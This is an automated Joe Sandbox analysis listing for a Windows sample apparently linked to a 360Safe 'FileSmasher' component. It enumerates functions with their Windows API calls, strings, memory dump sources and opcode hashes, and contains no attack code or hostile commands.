                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Image$Graphics$AllocBitmapContextCreateDeleteDrawFormatFromHeightPixelRectScan0Width
                                • String ID:
                                • API String ID: 2487541727-0
                                • Opcode ID: 98d478eadfeba97cf78130aa386867eee6fd277fb74fb1945411d1a5806641a6
                                • Instruction ID: e440d22e4396f5d12bb9ec9e6ce0b4ce439fd3521e5479917a7f6efb2c510700
                                • Opcode Fuzzy Hash: 98d478eadfeba97cf78130aa386867eee6fd277fb74fb1945411d1a5806641a6
                                • Instruction Fuzzy Hash: 1A2141B5A0011ABFDB10DFA9D881AAEF7F8FB54308F10856EF518D3200D674AD418BA5
                                Function 00434270 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 339COMMON
                                Download Yara Rule
                                APIs
                                • GetClassLongW.USER32(?,000000E6), ref: 004342B6
                                • SetClassLongW.USER32(?,000000E6,00000000), ref: 004342C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ClassLong
                                • String ID: $RN$%s%s$T9N$default
                                • API String ID: 582411763-3915848410
                                • Opcode ID: 82f49b8d56515e79b7ac65b1c4c45f0a6013591393b387152726ec3e5e007b66
                                • Instruction ID: 215032063d526a6b60c1858507d6e0e35a73955875a6123a1949ccb04bec6185
                                • Opcode Fuzzy Hash: 82f49b8d56515e79b7ac65b1c4c45f0a6013591393b387152726ec3e5e007b66
                                • Instruction Fuzzy Hash: C2C17931208341ABD710DF69C881B9BB7E4AFD9708F14491EF944AB391C778ED46CB9A
                                Function 0045E460 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 284threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0045E48B
                                • EnterCriticalSection.KERNEL32(?), ref: 0045E49F
                                • LeaveCriticalSection.KERNEL32(?), ref: 0045E4B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                • String ID: FileSmasher\comfirmdlg.xml$IDS_MSG_TITLE$IDS_POP_LOGO_IMGID
                                • API String ID: 2351996187-460408531
                                • Opcode ID: 423b19f3271c6dc9317d9b9952f69eb6d48c55b4bd3454dbdf34514be2d30294
                                • Instruction ID: 1b0f27efa783b1bd38bf54292848568ffc2e723f9f63cdb7e22d6f21943f4c07
                                • Opcode Fuzzy Hash: 423b19f3271c6dc9317d9b9952f69eb6d48c55b4bd3454dbdf34514be2d30294
                                • Instruction Fuzzy Hash: F5A1C371204301AFE714DF66CC81F4B77E8AF59714F10452EFA04AB282E739E909CB9A
                                Function 004305F0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 244COMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32(00000007), ref: 00430624
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004307ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CloseHandleWindow
                                • String ID: %d:%s,%s$T9N$`$pK
                                • API String ID: 3235909452-1085668790
                                • Opcode ID: 9ab21ffd5fc9b75c3598339e9f366cbefc0aee2b9ed7909960e4dfc6bad1882d
                                • Instruction ID: e060a5e3de00ca8db65478713cfe5ef3418896bd8cf46b1bc53b4f3ec04077e5
                                • Opcode Fuzzy Hash: 9ab21ffd5fc9b75c3598339e9f366cbefc0aee2b9ed7909960e4dfc6bad1882d
                                • Instruction Fuzzy Hash: 53A1907190024AEFDB04DF95C881B9EB7B4FF48314F14862EE815A7381D778AA45CBE4
                                Function 00428650 Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                Download Yara Rule
                                APIs
                                • CopyRect.USER32(?,?), ref: 004286D1
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000004,00000000,?,?,?,?,1D1D1D8C), ref: 00428705
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?,1D1D1D8C), ref: 0042874C
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?,1D1D1D8C), ref: 0042879F
                                • GdipDeleteBrush.GDIPLUS(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?), ref: 004287A8
                                • GdipDeleteFont.GDIPLUS(?,?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?), ref: 004287B1
                                • GdipDeleteFontFamily.GDIPLUS(?,00000000,?,?,?,?,1D1D1D8C), ref: 004287BD
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Delete$FontFormatString$BrushCopyCreateFamilyHintRectRenderingText
                                • String ID:
                                • API String ID: 3759438238-0
                                • Opcode ID: df7aa3096c852ff0e68b98ebeccaf79c573fd760911f2fa3b6c2d8ae2d99ee80
                                • Instruction ID: e3f0f0436f10e7231e6be9fae70369ccf633b2d8a1b7ff7d54ee89e77877cb73
                                • Opcode Fuzzy Hash: df7aa3096c852ff0e68b98ebeccaf79c573fd760911f2fa3b6c2d8ae2d99ee80
                                • Instruction Fuzzy Hash: 78513E71E01119EFCB04DFA5D880AEEBBB8FF48714F10815AE910AB240DB35AD15CBA4
                                Function 004340F0 Relevance: 10.6, APIs: 7, Instructions: 128windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(00000000), ref: 0043416B
                                • GetMessagePos.USER32 ref: 0043417A
                                • ScreenToClient.USER32(00000000,?), ref: 00434198
                                • CopyRect.USER32(?,?), ref: 004341C3
                                • SetFocus.USER32(00000000,?,?), ref: 004341DF
                                • PostMessageW.USER32(00000000,00000787,00000000,00000000), ref: 00434212
                                • SendMessageW.USER32(00000000,00000200,00000001,00000000), ref: 00434221
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Message$ClientCopyFocusPostRectScreenSendVisibleWindow
                                • String ID:
                                • API String ID: 2748411872-0
                                • Opcode ID: 279e5d58f11e983977a9a209ef140a337322d0b1437d670832ec6569d8cc7733
                                • Instruction ID: b2dacfc8fa355c76718d6420920e3f16cb606e0aee05ae2445eece695ce4b699
                                • Opcode Fuzzy Hash: 279e5d58f11e983977a9a209ef140a337322d0b1437d670832ec6569d8cc7733
                                • Instruction Fuzzy Hash: CD414F71600205AFEB14DF55CC84FAB77A8EF99350F10865AF915AB390DB34ED01CB64
                                Function 004AA520 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004AA56C
                                • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 004AA595
                                • _memset.LIBCMT ref: 004AA642
                                • lstrcmpiA.KERNEL32(?,?), ref: 004AA66A
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset$Valuelstrcmpi
                                • String ID: Software\360Safe\Liveup$mid
                                • API String ID: 999496690-2395435937
                                • Opcode ID: c99ca5e81b02d1620d9dc4415e0673db51d686a5c0c6622f0e281984eff48d7a
                                • Instruction ID: b492119fd73ce0d9529ffcaaf72970bcda56fcff49eeb761907619a045a37326
                                • Opcode Fuzzy Hash: c99ca5e81b02d1620d9dc4415e0673db51d686a5c0c6622f0e281984eff48d7a
                                • Instruction Fuzzy Hash: 884117315043459FD735DB24C841BFB77D8AFA6708F08492EE58A87281EB34991DCB5B
                                Function 0046C460 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule
                                APIs
                                • CallWindowProcW.USER32(?,00000001,?,?,?), ref: 0046C4D6
                                • GetWindowLongW.USER32(00000001,000000FC), ref: 0046C4E7
                                • CallWindowProcW.USER32(?,00000001,00000082,?,?), ref: 0046C4FF
                                • GetWindowLongW.USER32(00000001,000000FC), ref: 0046C519
                                • SetWindowLongW.USER32(00000001,000000FC,?), ref: 0046C52E
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Long$CallProc
                                • String ID: $
                                • API String ID: 513923721-3993045852
                                • Opcode ID: 804adb479330d2158328d58e8ec34ddf2a6ad6c4fffd224ca4cc7b18ecfb6e8b
                                • Instruction ID: 829c855f8e88a4c409aa734e283a464b9be5b60d3a12ba7bd4f9b40a6a5a15f1
                                • Opcode Fuzzy Hash: 804adb479330d2158328d58e8ec34ddf2a6ad6c4fffd224ca4cc7b18ecfb6e8b
                                • Instruction Fuzzy Hash: A741FAB5600614AFCB24CF59D8849ABB7F8FB88710B108A1EF99AD7750D734E941CFA4
                                Function 00486512 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004865A1
                                • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004865CA
                                • GetWindowLongW.USER32(?,000000FC), ref: 004865DC
                                • GetWindowLongW.USER32(?,000000FC), ref: 004865ED
                                • SetWindowLongW.USER32(?,000000FC,?), ref: 00486609
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: LongWindow$MessageSend_memset
                                • String ID: ,
                                • API String ID: 2997958587-3772416878
                                • Opcode ID: 9b1428e27582b108472f702563873b26a1a01680aeb2374d7e618b7780049f84
                                • Instruction ID: fcf382016dc8bdb5a7b8c00e16659be162168b8252942fa143cdf4702e046031
                                • Opcode Fuzzy Hash: 9b1428e27582b108472f702563873b26a1a01680aeb2374d7e618b7780049f84
                                • Instruction Fuzzy Hash: D431C370600611AFCB20BF79D888A6EB7E5BF48314F160A3EE54597791DB38E800CB58
                                Function 0042A520 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(sites.dll), ref: 0042A533
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID: GetFileDataFromStorage$GetFileLengthFromStorage$sites.dll
                                • API String ID: 4139908857-1979421132
                                • Opcode ID: 205c3618236d13193b8898fb90c854bb3bf55a54a3c46c2efd1e888821f4b97f
                                • Instruction ID: 1fa310f7eff1b83844a300552924f15398ef1374e5edf1b91b641dc429db63ca
                                • Opcode Fuzzy Hash: 205c3618236d13193b8898fb90c854bb3bf55a54a3c46c2efd1e888821f4b97f
                                • Instruction Fuzzy Hash: BF01D6323403267BDB115AB9AC80ABB73DC9FC5725750402BFD0CC7202EA38D85582A9
                                Function 0047E760 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNEL32(Kernel32.dll,?,?,0046707B,1D1D1D8C,?,?), ref: 0047E792
                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047E7AB
                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0047E7BA
                                Strings
                                • Wow64RevertWow64FsRedirection, xrefs: 0047E7B4
                                • Kernel32.dll, xrefs: 0047E781
                                • Wow64DisableWow64FsRedirection, xrefs: 0047E7A5
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
                                • API String ID: 2238633743-1575494070
                                • Opcode ID: be671781c8c432fcebdbfcb8745fcd3c82e020e70c8d0e22d2799a6f5ff895f8
                                • Instruction ID: 4ecdc83dd5505c3cbb38689492599f8d91eda5e768caebdcd881cf47f59fc17b
                                • Opcode Fuzzy Hash: be671781c8c432fcebdbfcb8745fcd3c82e020e70c8d0e22d2799a6f5ff895f8
                                • Instruction Fuzzy Hash: 2E0125B56003899FC724DFA6ECC0966F7E8EB59701331456FE459C7721C7356880CB58
                                Function 0047E820 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNEL32(Kernel32.dll,004C0CB4,0046D5DF), ref: 0047E84C
                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047E864
                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0047E873
                                Strings
                                • Wow64RevertWow64FsRedirection, xrefs: 0047E86D
                                • Kernel32.dll, xrefs: 0047E83B
                                • Wow64DisableWow64FsRedirection, xrefs: 0047E85E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: Kernel32.dll$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection
                                • API String ID: 2238633743-1575494070
                                • Opcode ID: e501e02ad7344acbb4263cb58b87f254c23cca5508dab8845d0b4c2e2ecfd66a
                                • Instruction ID: a01be648aa922b1640926440c58b6a2f55d0dbd03a48ea489f8060510f167247
                                • Opcode Fuzzy Hash: e501e02ad7344acbb4263cb58b87f254c23cca5508dab8845d0b4c2e2ecfd66a
                                • Instruction Fuzzy Hash: 9CF0DAB09003419BC7619F6AEC84A55F7E8EBE5B01322556FE4A5C7231D7745481CB58
                                Function 004803B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 27libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(sites.dll,?,00480587,00480B8B,1D1D1D8C,004276DB,?,?,000000FF), ref: 004803B6
                                • GetProcAddress.KERNEL32(00000000,GetFileLengthFromStorage), ref: 004803CF
                                • GetProcAddress.KERNEL32(00000000,GetFileDataFromStorage), ref: 004803DC
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: GetFileDataFromStorage$GetFileLengthFromStorage$sites.dll
                                • API String ID: 667068680-1979421132
                                • Opcode ID: ba44ad3ebad217459ec54b6af6064ea26d7671eb7bb5d99ab269c39b9de9ea0a
                                • Instruction ID: 76776a9aca3c09fab9a284d6ac2efe263d43b6458e039b26a7ef354f785f9032
                                • Opcode Fuzzy Hash: ba44ad3ebad217459ec54b6af6064ea26d7671eb7bb5d99ab269c39b9de9ea0a
                                • Instruction Fuzzy Hash: BAE092315617119BD6D0AB387C04F8F3698DB90B90F06013BEC0096252D779C941879C
                                Function 00428370 Relevance: 9.3, APIs: 6, Instructions: 258COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateFromHDC.GDIPLUS(?,?,?,1D1D1D8C), ref: 00428415
                                • CopyRect.USER32(?,?), ref: 00428449
                                • GdipSetClipRectI.GDIPLUS(?,?,?,?,?,00000000,?,1D1D1D8C), ref: 00428490
                                • GdipResetClip.GDIPLUS(?,?,?,00000000,00000000,00000000), ref: 00428545
                                • GdipDeleteBrush.GDIPLUS(?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00428617
                                • GdipDeleteGraphics.GDIPLUS(?,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 00428620
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
